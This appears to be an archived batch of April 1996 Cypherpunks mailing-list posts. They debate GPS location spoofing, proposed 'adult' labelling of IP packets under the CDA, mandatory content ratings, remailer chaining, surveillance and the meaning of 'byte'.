>> to satellite 4.
>Aren't things even worse? Since the satelite signals are not
>authenticated with anything like public key methods, couldn't I just
>synthesize a signal appropriate to any spot on the planet, knowing the
>positions of the satelites relative to that spot?

No, you can't.  One problem is that the Selective Availability coding
isn't predictable, since it uses some kind of secret military code -
so you don't know what its values are until you hear them.
So as long as you share any satellites with the recipient, you need
to be sure to output the correct codes for that satellite,
which means you need to either be in range or have access to some
internet "position remailer" site that's making them available.

As far as predicting relative timing between satellites to fake your
position, if that's sufficiently unpredictable that you can't fake it,
as Denning and MacDoran say, then it should also be equally unpredictable
to the verifier who wants to know if you're telling the truth or faking it.
And if you require systems to respond to requests for "Where are you now?"
or especially "Where were you on the night of April 13th at 8:37pm?",
the spoofer can request that information just as easily as the verifier.

One method that could be used to prevent faking is GPS receivers with
"tamperproof" digital signature capability, which would not only receive
the location information but sign it; that's not much more secure
than just having a "tamperproof" token in the first place.

As far as the multipath issues that some people have brought up,
I searched for "MacDoran" on altavista, and found several papers
on GPS multipath, so they're aware of the issue, though I don't
know how they're planning to address it.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 13 Apr 1996 20:07:49 +0800
To: cypherpunks@toad.com
Subject: Re: Protocols at the Point of a Gun
Message-ID: <199604121845.LAA01353@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Should this nonsense of adding "Adult bit" to IP headers actually be
implemented, I will sponser a contest:

A free emailed "Thanks" to the first person who (truefully) reports that an
Adult Internet access username and password has been posted (or scrawled on
the bathroom wall) at a US high school.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 13 Apr 1996 06:15:31 +0800
To: cypherpunks@toad.com
Subject: Demonizing the Opposition: Bruce "The Toolman" Taylor
Message-ID: <v02120d0cad94054e9da6@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At CFP96, Bruce Taylor, Brock Meek's "lawyer with brass balls", and Declan
McCullagh's "architect of the CDA" (who seems like a Pretty Stand-Up Guy,
except he wants to tell us how to think), sat on the dias and made
repetitive inflamatory references to a picture of "female genitalia nailed
to a board", and others to a picture of "a penis with a blister on it",
citing them as examples of the Rampant Filth and Corruption We Find on the
Internet Today, Brothers and Sisters, Say Haleluja.

Unfortunately, as hard as I tried to remain true to the Spirit of CFP, and
not Demonize the Opposition, I couldn't help but come up with a spiffy new
moniker for Mr. Taylor, which I will try to remember to use from time to
time, viz.,

Bruce "Penis with a Blister" Taylor
abbreviated PWAB, or "Blister" I suppose

Of course, the CDA-able version of this proposed new handle would be,

Bruce "The Toolman" Taylor
shortened to "Toolie"? "The Tool"? "Toolboy"?

;-).

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 13 Apr 1996 13:30:46 +0800
To: Adam Shostack <mccoy@communities.com (Jim McCoy)
Subject: Re: No matter where you go, there they are.
Message-ID: <m0u7oHD-0008zIC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:14 PM 4/11/96 -0500, Adam Shostack wrote:
>Jim McCoy wrote:
>  What is
>| Dennings fascination with building Big Brother?
>
>	She read Snow Crash, and it scared her.
>	Snow Crash is a book about a future in which governments are
>ineffective.  Companies run things, and have complete local control.
>The world has gone to hell, and as a result, life is nasty, poor,
>brutish and short.  Many people do not look forward to this world.
>Thats an understandable reaction; when I first heard about anonymous
>assasination markets, I thought it was pretty bizzare as a world to
>look forward to.

However, looked at from the standpoint of somebody who is not already 
steeped in it, OUR society is a "pretty bizarre world."  Ostensibly we live 
in a society that loves freedom, yet it's controlled by a rather tiny number 
of people who wield an extraordinarily large amount of power.  We can be 
beaten or killed by agents of the government, and the only time a ruckus 
seems to be raised is when there happens to be a camcorder nearby, one that 
the  police do not notice in time.  I haven't heard much speculation about 
why we never (actually, almost never) see such cases without recordings.


>	Then I heard Neal Stephenson speak.  And he brought up a very
>good point, which was Hitler killed more people than Charles Manson
>because Hitler had a big country, and its large army.  I look
>forward to smaller, weaker government that can't put the Japs in
>holding camps, surround and harras the Branch Davidians, etc.
>
>	The debate, really, boils down to Hobbes v. Locke, or Plato v.
>Aristotle.  Its not going to be resolved anytime soon by a
>philosopher.

I think it will be resolved by a computer programmer.

I am reminded of the scene in the TV show "Hitchhiker's Guide to the 
Galaxy," when the two philosophers complained to the computer, "Deep 
Thought" (Assigned the task of answering the question of "Life, the 
Universe, and Everything"), something like "What's the point of debating the 
existence of God, when you're going to tell us his address?"

There is precedent for this kind of frustration.  I seem to recall that more 
than 10 years ago, or more, that the solution/proof for the 4-color mapping 
problem (The theory that all maps could be colored with at most 4 colors) 
was done by computer.  It was accomplished, as I recall, by exhaustively 
testing "all" the various possibilities (having been narrowed down 
appropriately), and determing that they needed no more than 4 colors.

Mathematicians, who were used to multi-page proofs that a human could 
actually comprehend and follow on a step-by-step basis, were unhappy that it 
all came down to a computer.

  Many of us have read Mill, Hayek, Freidman, Nozick, and
>decided that we prefer that world view.  That Dr. Denning has decided
>that she likes Philosopher-Kings is not particularly unusual, except
>in the computer business.  Go read Leviathan.  Think about what we're
>talking about here.
>
>	Its a scary new world that I expect will be created, by the
>UNSTOPPABLE advance of technology.  There is no weapon created that is
>not used by someone who judges the cause to be worthwhile.  Nukes,
>chemicals, and biologicals have all been used against civilian
>populations.  I judge that stopping the advance of cryptoanarchist
>technology will fail (in the long run), and not be worth the price.  I
>suspect Dorothy disagrees, and there lies her fascination with
>building in Big Brother.

I think the thing to remember is that the "worth the price" issue  appears 
to depend substantially on who you are.  If you're a powerful government 
official, who fears losing his cushy job and maybe even his life, it may 
appear to be worth an effort.  From the standpoint of the ordinary citizen, 
however, if he understands what's at stake he'll recognize that it isn't.  

Jim Bell
jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 13 Apr 1996 22:01:16 +0800
To: cypherpunks@toad.com
Subject: Any examples of mandatory content rating?
Message-ID: <ad93dffc1b021004ed13@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



There are several swirling proposals for "rating" of Internet packets,
Usenet articles, Web pages, and perhaps other computer-communicated items.
There are also things like the "V-Chip," included as part of the
Telecommunications Act. (The V-Chip is ostensibly a "voluntary self-rating"
scheme, with an included mandate that government will give industry a year
or so to come up with a plan.)

I foresee major legal challenges to mandatory ratings of content. Issues
involving prior restrain, censorship, and the First Amendment of the U.S.
Constitution.

I'm interested in hearing about any _actual_ examples where a government
body in the United States has mandated that intellectual property (roughly,
written words, magazines, motion pictures, CDs, etc.) be "rated" or
"age-labelled." Before anyone out there fires up his "Reply" and tells us
about movie ratings, magazine warning labels, and the like, read on.

To forestall a couple of likely examples some will cite, let me discuss a
few oft-cited cases:

1. Movie ratings. The familiar "G," "PG," "R," and "NC-17." (Used to have
"M" for "Mature," and "X" for, well, X-rated stuff.)

In actuality, these ratings are _not_ mandated by law, and are done by the
MPAA, the Motion Picture [something] Association. There may be serious
legal charges brought if, say, a 10-year-old child was let into a showing
of "Debbie Does Fort Meade," but this would be after the fact and would
presumably involve negligence charges of some sort (contributing to the
delinquency of a minor, child abuse, etc.).

(A parallel to this is ordinary speech to a child. While speech is not
required to be rated, there might well be various sanctions applied to an
adult who spoke to a child in various indecent or obscene or "patently
offensive" ways. I'm not saying whether I endorse this, and it would depend
on just what was said, but the point is that there is no "rating" system
for speech imposed, nor would the Constitution admit one.)

We may speculate that had the movie industry not adopted "voluntary
ratings" in the 1960s, government may have tried to impose ratings, but the
fact is that government did NOT impose content ratings. (The important
point being that we cannot look to how the movie situation evolved for
hints about how Internet packets or articles might be rated.)

Note also that the MPAA ratings are not "self-ratings," but are done by a
panel of MPAA representative. Many film directors have been very angry over
the MPAA ratings they received, and would not have rated their films as the
MPAA panel did.

There are then local ordinances about allowing children in to see "R" or
"NC-17"-rated movies, but this is a case where the government piggybacks on
the "private" ratings service (which could raise some important
constitutional issues if it was ever seriously challenged, which seems
unlikely).

This MPAA situation is an important example because it is neither
"self-rating" nor "government" rating, but is, instead, something else.
This model would be extremely hard to apply to the Internet, as there is no
similar body to the MPAA, nor is there the same economic incentive for any
such body to form and then to try to cope with tens of thousands (at least)
of articles and pages per day....

1A. A special case of this system is _television and radio broadcast_ of
indecent material, a la the FCC's regulations about content broadcast over
the airwaves at various times of the day. Cable is not regulated in the
same way, though most cable systems I have seen have "adult" material in
the evening hours (though definitely not confined to late evening). Lots of
wrinkles here, and the FCC is attempting some regulation of some
cable..."The Playboy Channel" is involved in a dispute where they are being
told they can only send their channel out after certain hours...details
should be accessible on the Web.

I think this special case of FCC involvement covers a different set of
issues than the "content" issue per se. Though this may help to explain
some of the rumors about the FCC seeking a broader mandate to regulate
"cyberspace," as this gives them a foot in the door to regulate content on
the same basis they regulate content of broadcasts.

Moving on....

2. Magazines, as in "For Adults Only!" emblazoned on the covers. In doing
my "research" for this article, I consulted my "reference materials," and
discovered that such warnings are less common than I remembered them as
being. Neither "Penthouse" nor "Playboy" issues that I have at hand contain
any such warnings, though some other mags do.

So far as I know, there is no government requirement for labelling. Again,
there may be sanctions imposed for, say, selling such a magazine to a
minor. I can't say as I've ever heard of a court case along these lines.

Importantly, there appears to be no "ratings board" run by the government
that rates such materials a priori. ("Obscenity" is not the same as
pornography or nudity, as we all must know by now.)

I conclude that magazines need not be labelled, voluntarily or otherwise,
though there may be sanctions if children are exposed to certain materials
(though this is unlikely). More to the point, it seems likely that the laws
which exclude children from entering bars and strip joints are the one
which would apply to keeping children out of "adult bookstores."

An important point was made recently by someone on the Cypherpunks list,
that some libraries make a point of providing access to _all_ materials, by
_all_ patrons, including back issues of "Penthouse." So far as I know, no
librarians have gone to jail for this.

Moving on...

3. "Explicit Lyrics" labels on CDs and music. This one is more iffy. I
recall the _proposals_ to require such labels, and Tipper Gore (wife of VP)
was a leader in this campaign some years back, but I don't believe any laws
were formally passed. I could be wrong. And some local jurisdictions may
have such laws; I recall some part of Florida mandated a labelling law, or
banned sales of explicit lyrics CDs in some way. (The "2 Live Crew" issue,
with "Me So Horny" and other gems.)

And none of the CDs I have seen here in California with "Explicit Lyrics"
or "Parental Advisory" notices mention who did the rating, whether the
lyrics are "Government Censor Approved," etc.

This tongue in cheek mention of "Government Censor Approved" is an
important point: any hint that a government censor is to apply ratings to
written or spoken or similar materials runs smack dab into the First
Amendment. This is not just an academic matter. There is no provision for a
"ratings board" to review content, and such a "prior restraint" (can't
publish something until it's been rated or approved) is a textbook case of
prior restraint, forbidden by the First Amendment. (The H-Bomb case
involving "The Progressive" was ultimately decided in favor of no prior
restraint, even for such a potentially serious situation.)

So, if anybody's still reading this, I am interested in _any_ examples
where intellectual content (as opposed to food or drug packaging, for
example) is required to be labelled.

Such examples might shed some light on how these various proposals for
"labelling" of Net traffic might work. And absent such examples, might show
just what a tough road lies ahead for those advocating such labelling.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 13 Apr 1996 13:16:20 +0800
To: cypherpunks@toad.com
Subject: Re: Demonizing the Opposition: Bruce "The Toolman" Taylor
Message-ID: <199604121916.MAA04360@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:08 PM 4/12/96 -0400, Robert Hettinga wrote:
>Bruce "Penis with a Blister" Taylor
>abbreviated PWAB, or "Blister" I suppose

Seems to me that "a penis with a blister on it" is a good description of a
picture of active syphilis.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 13 Apr 1996 09:27:53 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: questions about bits and bytes
Message-ID: <199604121934.MAA13397@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:05 AM 4/11/96 -0800, jim bell <jimbell@pacifier.com> wrote:
>>- From a really quick web search, we find that the SGI Impact jams 9-bit
>>bytes [that's what it says] across the Rambus internally. I'm not sure
>>if the memory itself is 9-bit.
>
>Are you sure they're not referring to 8 bits of data and a parity bit?  In 
>any case, please give the address to the list so that it can be checked out.

www.altavista.digital.com, which is the address of almost everything :-)

If you don't count the parity bit as part of the byte here, you probably
shouldn't count it in a typical 7-bit-ASCII-plus-parity situation either.

As far as jamming 9-bit-bytes across a bus, that almost certainly _is_
8 bits of data and one parity bit; people have been agitating for
and debating parity on memory busses for a long time.

AT&T's Datakit switch (an ancestor of ATM) used 9-bit bytes on its data busses,
where 8 bits were data-from-outside and one bit was a control-vs-data indicator,
which let cards listening to the bus decide whether to think about the byte
with their control processors or just shove them onto an output wire.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: me@muddcs.cs.hmc.edu (Michael Elkins)
Date: Sat, 13 Apr 1996 20:00:39 +0800
To: cypherpunks@toad.com
Subject: Re: Scientologists may subpoena
In-Reply-To: <1A5C983A02502C79@-SMF->
Message-ID: <199604121937.MAA18253@muddcs.cs.hmc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Scott Binkley writes:
> What if we set up a chaining remailing system in as many countries as 
> possible, all working in double blind
> mode.  You could have it randomly pick 20 or so remailers before actually 
> sending the message to its destination.
> 
> That isn't a very clean method, but would sure slow down the process of 
> obtaining court orders in each respective country.

This is true.  We definitely could use more remailers outside the US.
Especially since we all know that if you have enough money, you can
get away with murd^H^H^H^Hanything in this country,possibly even getting
access to remailer records.

> I have this other idea, but it would be difficult to set up.  Again, with 
> many many remailers, you could set it up, so that 
> any message you send is sent to a random FTP site of the day.  Each of 
> the remailers randomly picks messages out
> of the pool at the FTP site, and sends it on its way (all is encrypted of 
> course).  At the end of the day, the FTP site is 
> erased, and  a new one is set up somewhere else (all remailers would then 
> scan there).
> 
> The beauty is that when a remailer pulls a message out of the FTP site, 
> it has no idea where the message came from, nor which
> remailer (country) sent it there (providing the pooled messages have had 
> the return addresses removed).  This would make it 
> very difficult to track down to the source.
> 
> The disadvantage is that it requires cooperation between remailers, and 
> that a message cannot be replied to.

Some of the cypherpunk remailers already sort of do this.  However, the only
thing it really does is make it a little harder to do traffic analysis.
The main problem with your scheme is that all of the remailers would have
access to the final destination of the message.  The best method is still
to use a randomly selected group of remailers for each anonymous message,
and change your reply block on your nym often.

me
--
Michael Elkins <me@cs.hmc.edu>			http://www.cs.hmc.edu/~me
PGP key fingerprint = EB B1 68 32 3F B5 54 F9  6C AF 4E 94 5A EB 90 EC




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 13 Apr 1996 16:21:07 +0800
To: cypherpunks@toad.com
Subject: Re: questions about bits and bytes [NOISE]
Message-ID: <ad93f754000210046940@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:20 AM 4/12/96, JonWienke@aol.com wrote:
>In a message dated 96-04-11 20:26:44 EDT, jeffb@sware.com writes:
>
>>[I told myself I was going to stay out of this, but Jim Bell's dogmatic
>>stance irks me... ]  Here's a citation from "Portability of C Programs
>>and the Unix System" by S.C. Johnson and D.M. Ritchie (yes, that Richie)
>>in the Bell System Technical Journal volume 57, Number 6, July-August 1978.
>
>Citing sources from 1978 in the computing field is a little like using
>dictionaries from the 1800's to dictate modern English usage.  My desktop
...

I've been ignoring most of these quibbles about the definition of "byte"
and when it came about, etc., but the debate never seems to end.

I went to the Jargon File (aka The Hacker's Dictionary), where a nice
online version resides at http://beast.cc.emory.edu/Jargon30/JARGON.HTML


This is what I found:


byte


: /bi:t/ [techspeak] n. A unit of memory or data equal to the amount used
to represent one character; on modern architectures
this is usually 8 bits, but may be 9 on 36-bit machines. Some older
architectures used `byte' for quantities of 6 or 7 bits, and
the PDP-10 supported `bytes' that were actually bitfields of 1 to 36 bits!
These usages are now obsolete, and even 9-bit bytes
have become rare in the general trend toward power-of-2 word sizes.

Historical note: The term was coined by Werner Buchholz in 1956 during the
early design phase for the IBM Stretch computer;
originally it was described as 1 to 6 bits (typical I/O equipment of the
period used 6-bit chunks of information). The move to an
8-bit byte happened in late 1956, and this size was later adopted and
promulgated as a standard by the System/360. The word
was coined by mutating the word `bite' so it would not be accidentally
misspelled as bit. See also nybble.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sat, 13 Apr 1996 07:27:17 +0800
To: cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
In-Reply-To: <199604120314.WAA05634@homeport.org>
Message-ID: <199604121744.MAA08365@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> 	Snow Crash is a book about a future in which governments are
> ineffective.  Companies run things, and have complete local control.
> The world has gone to hell, and as a result, life is nasty, poor,
> brutish and short.  Many people do not look forward to this world.
> Thats an understandable reaction; when I first heard about anonymous
> assasination markets, I thought it was pretty bizzare as a world to
> look forward to.

I agree with you that it's a pretty bizzare world to look forward to, but 
how likely is it?  It's always seemed to me that both sides of the crypto 
debate have been overselling the changes crypto is going to bring.  
Crypto won't make surveillance impossible, it will make it expensive.  
That's a big difference.

My computer is loaded up with crypto.  I use pgp, ssh, sfs, cfs, etc., 
every day.  I've picked strong passphrases, and I edit sensitive files on 
a ram disk.  But getting my data would be child's play for the nsa if 
they were interested enough in me to come into my apartment and make an 
active attack.

Military security depends as much upon military discipline and procedure
as it does on strong crypto tools.  When crypted email becomes the norm,
remember that 95% of the keys in the world will be sitting on hard drives
in the clear or protected by passphrases like "bob1".  Software that
forces people to pick strong passphrases won't be popular in the
marketplace.  I know:  I run an ISP, and everytime I tell someone how to
pick a password, they always come back with "bob1".

There's a mindset out there that says, "the only way to fight crime is to
do massive surveillance." I don't buy it.  Surveillence technology is
fairly new, and there were law abiding societies before it was deployed.
It's like people who feel that the only way to stop violence in cities is
to take away guns.  If that's true, how come there are so few murders in
Western Nebraska (I have family there), where almost everyone is armed?

The truth is the police do surveillence easily and cheaply now, and it's
not working.  Things are getting worse in many places, not better.  Beat
cops who talk to people and who know the neighborhood are more effective
than spooks in vans or centralized monitoring facilities with
sophisticated electronics.  If we don't want crime, we're going to have 
to make sure people have enough skills to develop other economic 
opportunities.  The answer is jobs, not a telescreen in every home.

It is true that law enforcement has been building up a giant surveillance
apparatus over the past couple of decades, and that crypto is going to
kill it.  But it's also true that the buildup in surveillence has 
coincided with a decrease in the effectiveness of police forces in 
general.  Surveillance is good for massive beauracracies with bloated 
budgets who work behind closed doors and who aren't held accountable for 
their failures.  It's not good for fighting neighborhood crime.

I reject the opposition's premise:  surveillance is not necessary to keep
the four horsemen at bay.  How can they have the chutzpah to demand that I
sacrifice my civil liberties in the name of the drug war, when everyone in
Chicago knows that dealers are allowed to sell without harassment on
literally thousands of street corners in this city?  They don't need
clipper to stop the crack trade, they need to send cops out to arrest the
people who are standing out in broad daylight selling and buying.

It doesn't take a gps system to track them down.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkmoore@iol.ie (Richard K. Moore)
Date: Sat, 13 Apr 1996 01:01:21 +0800
To: trei@process.com
Subject: Re: No matter where you are, you can lie.
Message-ID: <v0211012aad93e9600833@[194.125.43.36]>
MIME-Version: 1.0
Content-Type: text/plain



4/10/96, Peter Trei wrote:
>Therefore any site that can see the same set of satellites as the site it is
>trying to simulate can do so, buffering less than 50 ms of waveforms and
>pretending to be on the end of a slow link.

        That's what I assumed in the first place.  Thanks, Peter, for doing
the math.  Do you have a solution as satellites cross the horizon, or for
very-distant spoofing?  ...co-conspirator nodes tightly-coupled via laser
or wire?

-rkm
(not on cypherpunks)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an366601@anon.penet.fi (** CRAM **)
Date: Sat, 13 Apr 1996 03:14:51 +0800
To: cypherpunks@toad.com
Subject: Australia cracking down on the internet?!?!
Message-ID: <9604121303.AA17137@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain




X-Anonymously-To: an366601
Reply-To: an578849@anon.penet.fi


    Thank you CRAM for your informative and interesting peices aznd
snippets from the American Press. Out here in the land of Oz, the state
governements are whipping up a frenzy of legislation, including laws
prohibiting the uploading or downloading of any material that may be
offensive to minors. Penalty: $25000 and/or 1 year in jail. The push is on
to make ISPs the defacto publishers and censors of all material that
passes through them. And as always its the child pronography thing that
predominates the discussion. It is unfortunate that at the same time the
internet is booming, there is a huge peadophile hunt going on here in
Sydney (turns out the peodophiles have powerfull allies amongst the
policians and judges, no surprises there). People open their newspapers
and see "Peadophiles use internet" and their minds shut like steel doors.

    Keep up the good work.


--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 13 Apr 1996 07:58:16 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Mystery of the unsuvscrives: SOLVED?
Message-ID: <Pine.SUN.3.91.960412130613.20272A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



On replying to one of the many recent unsubscrivers I got this in return:

A creative spam attack?

---------- Forwarded message ----------
Date: Fri, 12 Apr 1996 11:34:53 +0100
From: Batman <batman@infomaniak.ch>
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: your mail


On Thu, 11 Apr 1996, Black Unicorn wrote:

> On Thu, 11 Apr 1996, Batman wrote:
> 
> > Please PUT me OUT of YOUR cypherpunks AND other MAIL-LISTS
> > 
> > Thankx
> 
> Please LEARN to UNSUBSCRIBE from MAILING lists and OTHER THINGS.
> 
> ---
> My preferred and soon to be permanent e-mail address:unicorn@schloss.li
> "In fact, had Bancroft not existed,       potestas scientiae in usu est
> Franklin might have had to invent him."    in nihilum nil posse reverti
> 00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
> 
> 
I don't think you're the mail-list admin, so, don't send me your advices.

I've been flooded and put in that shit mail-list without my permission.

GET OUT







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 13 Apr 1996 08:19:18 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <199604111939.MAA14774@toad.com>
Message-ID: <199604121822.OAA01246@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart writes:
>There are serious technical problems with the suggestion that labelling packets
>as "Adult" or "Child" using IP options and filtering at ISPs for censorship.

Few of the following are really *technical* problems.

>IP works on a per-machine basis (technically, a per-network-interface basis,
>though for most client machines that's the same thing.)  That means that a 
>web or nntp server including some "Adult" material and some "Child" material
>either needs
>a way for an application process to communicate this to the network drivers,
>or needs to label all packets as "Adult" to avoid the politically incorrect risk
>of mislabelling a packet as "Child" when it's not.  The standard TCP/IP API 
>programming interface software on Windows, Mac, and Unix machines doesn't
>provide 
>for applications to _tell_ the network drivers about IP options, so even if
>IPng had censorship features added, the applications couldn't use it.
>(There are a few military multi-level security versions of Unix that give
>you more flexibility for this sort of thing, but they tend to provide
>mandatory security so you _can't_ send a packet marked "UNCLASSIFIED" from a
>"TOP SECRET" session.)  

This is more of an economic problem than a technical one.  By the
"standard API" we usually mean "BSD sockets", which already has a
"getsockopt()" and "setsockopt()" interface for the application to
communicate this sort of thing.  Adding a SO_SECCLASS to change the
setting from the system default would be pretty straightforward,
technically.

>Another problem is that it only addresses single-user client machines,
>rather than multi-user operating systems such as Linux, which has a million
>or so
>users out there.  The model works fine when you treat a PC as a fancy version of
>a dumb terminal, but a machine shared by multiple users (whether many at one
>time,
>or one at a time) uses a single connection to support all of them - that
>means you
>can't have censored material available to the child and uncensored material
>available to the parent unless the networking software can pass the censorship
>labels on to the application program - but again, the standard operating system
>interfaces (developed over many years by thousands of The Free World's finest
>developers :-) don't have a way to implement it, because it was never a
>design goal.

Actually, this is a bit of an "ivory tower" picture of the Internet.
Conceptually, the protocols are purely peer-to-peer, but in the real
world, those end-user Linux boxes go through an ISP.  The User to ISP
link is governed by a contrac, which may specify filtering done at the
ISP.  If you want to access "adult" material, but don't want your kid
to be able to, you should get a separate filtered PPP account for the
kid.

>Trying to implement censored sessions at a transport level instead has its
>own problems.
>First of all, TCP provides reliable sessions; censoring packets based on IP
>labels
>in the middle of a transaction means that TCP will retransmit until the
>packet gets
>through or it gives up and drops the connection, so any "Adult" packets would

Not so.  If one end of the connection is discarding "adult" packets,
the SYN packet attempting to establish the session will *also* be
dropped, probably resulting in a "connection refused" (from a RST by
the other side) or "destination unreachable" (from the IP module that
discarded it).

>dump a Registered Child out of the browser, even if they were unintentional

Dropped connections don't dump you out of the browser.  You just get
a popup.  (If it *does* dump you out, get a new browser.)

>(e.g. from an Adult who labels all packets "Adult" to avoid being liable for
>mistakes,
>or packets from Europe that were default-labelled by a service provider to avoid
>having to read them all, or from the Library of Congress Online Edition if
>the Librarian
>labels each packet correctly.)

Again, these aren't technical issues, they're social.  A European
company who sends a dirty magazine to a sixteen year old American is
violating existing non-CDA decency laws.

>On the other hand, UDP packet exchange,
>which doesn't
>use sessions, would require validating the user's ID and authorization on
>each packet.

True, but this isn't a problem.  The "validation" is simply a matter of
checking the "information level" in the packet with the "authorization
level" of the user.  If the ISP is filtering adult packets, the "authorization
level" is a constant per PPP connection.  If the ISP is inserting "information
levels", it's still constant per PPP connection, but now the content provider
needs to check if the request is permitted to be fulfilled.  In either case
the test is trivial.  It's not like there has to be a key exchange and
RSA exponentiation for each packet.

>Furthermore, if the censorship information is carried at the transport level,
>or at a higher level (i.e. headers in the message itself), the only way the
>ISP's routers, which work at the IP level, can censor packets is to perform the
>equivalent of the Post Office steaming open envelopes before delivering them
>to your house, and refusing to deliver them if there's a child living in the
>house
>and the letter either contains a bad word or is written in a language the
>Post Office doesn't understand, such as Finnish or Japanese or PGP.

Agreed.  But the current discussion is about adding features to the network
layer.

>If you create outgoing packets that are labelled "Minor", and contain
>"Restricted to Government-Certified Adults Only, and No Felons or
>Foreigners Allowed" material, you can get busted for it.
>So you have to either restrict all your outgoing packets to be labelled 
>"RtG-C Adults O,aNFoFA", or else make sure all the material you transmit
>passes the "Government-Approved-for-Minors, Foreigners, and Victorian
>ladies" filter.
>
>On the other hand, if you don't log in to your ISP with a
>"government-certified adult,
>non-felon, non-foreigner, politically stable, not-a-Commie-or-Jew" id,
>it'll block any packets not approved for you.  Any news or web server will also
>have refuse to send any "Adult"-labelled material to you if the requests
>arrived on a "Kid"-labelled connection - this means that either the server
>machine
>will have to only carry Kid-approved traffic, or only talk to Adults,
>or add an "Adult" label to all outgoing packets whether marked "Kid" or not,
>or else it will have to break protocol boundaries by passing IP-layer
>information
>up to the application.

Regardless of whether information is added at the network layer to
communicate the "adult/minor" information, knowingly sending web pages
with adult material to a minor is illegal.  With current implementations,
providers have the excuse that they have no way of knowing that the requester
is a minor.  If the information is added to the protocols, they lose the
excuse.  Again, this is a social matter, not a technical one.

The point about breaking protocol boundaries is an interesting one, and
as far as I am concerned, the *only* technical issue you raise.  I note
that the IP layer's "Security Compartment" option, which is one I've
suggested might be used to implement the censorship, already provides
exactly this "violation".  The "Stream ID" option and "Type of Service"
field are similar "violations".  The TCP layer gives the application
layer the "Urgent" and "Push" flags, which are arguably similar
"violations".

Again, I'd like to emphasize that I think implementing this suggestion
would be censorship, and do more harm than good.  I really hope someone
can come up with a solid technical reason why doing this won't work,
but the more I think about it, the more I think it *will* work.  I
maintain that the CDA is bad socially, but that support for it at the
network layer is technically possible.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 13 Apr 1996 21:31:28 +0800
To: Marshall Clow <mclow@owl.csusm.edu>
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <v03005b03ad944efa70c3@[206.126.100.99]>
Message-ID: <199604121833.OAA01707@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Marshall Clow writes:
>>Anyway, you computer creates the IP packet, but then sends it to your
>>ISP's router.  That router *always* makes changes to the packet header
>>because it must decrement the time-to-live field and recompute the
>>header checksum.  The ISP's router software would (in the scenario I
>>suggested, but deplore), based on to whom it's connected, set the
